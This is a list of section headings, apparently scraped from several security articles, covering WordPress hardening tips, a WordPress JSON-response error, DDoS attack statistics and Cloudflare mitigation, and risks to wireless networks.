Why WordPress Security is Important?

1. Keep a Strong Password that is Hard to Crack

2. Keep a Username that Cannot be Guessed

3. Change the Author Slug to Hide Your Username

4. Setup 2-Factor Authentication for Login

5. Secure your .htaccess File for First Line of Defence

1. Restrict access to important files and folders

2. Disable directory browsing

3. Allow only specific IPs to access the Admin area

4. Disable access to XML-RPC File

5. Block author scans

6. Use a Security Plugin for All-round Protection

Why I Recommend the All-in-One WP Security and Firewall plugin?

7. Protect Your Site from DDoS Attacks

8. Make Regular Backups for Unforeseen Situations

9. Use SSL to Encrypt the Connection between Your Site and Users

10. Use Secure Hosting to Fortify Your Site

11. Change the Database Table Prefix to Deter Hackers

12. Update Your Plugins and Themes to Prevent Backdoor Access

13. Enable Auto Updates for Plugins and Themes

14. Disable the Theme and Plugin Editor

Why does “the response is not a valid JSON response” error occur?

Disable the Block editor and switch back to Classic editor

But what if you still want to use the block editor?

Mixed content error due to the use of SSL certificate

How to solve the Mixed Content Error in WordPress?

Alternative solutions to the response is not a valid JSON response error

The number of global L3/4 DDoS attacks in Q2 doubled

Small attacks continue to dominate in numbers as big attacks get bigger in size

In Q2, we saw the largest DDoS attacks on our network, ever

The United States is targeted with the most attacks

57% of all L3/4 DDoS attacks in Q2 were SYN floods

Cloudflare DDoS mitigation

What are the risks to your wireless network?

Piggybacking

Wardriving

Evil Twin Attacks

Wireless Sniffing

Unauthorized Computer Access

Shoulder Surfing

Theft of Mobile Devices

What can you do to minimize the risks to your wireless network?

Authors